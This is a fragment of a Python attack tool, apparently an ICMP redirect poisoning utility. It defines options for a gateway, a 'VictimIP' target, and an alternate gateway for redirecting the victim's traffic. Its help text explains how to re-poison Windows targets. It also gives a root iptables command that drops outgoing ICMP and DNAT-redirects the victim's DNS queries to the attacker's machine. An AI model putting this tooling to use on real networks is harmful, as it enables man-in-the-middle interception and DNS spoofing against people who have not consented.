parser.add_option('-g','--gateway',action="store",help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway",metavar="10.20.30.254",dest="OriginalGwAddr")

parser.add_option('-t','--target',action="store",help="The ip address of the target",metavar="10.20.30.48",dest="VictimIP")

parser.add_option('-r','--route',action="store",help="The ip address of the destination target, example: DNS server. Must be on another subnet.",metavar="10.20.40.1",dest="ToThisHost")

parser.add_option('-I','--interface',action="store",help="Interface name to use, example: eth0",metavar="eth0",dest="Interface")

parser.add_option('-a','--alternate',action="store",help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours",metavar="10.20.30.40",dest="AlternateGwAddr")

MoreHelp="Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)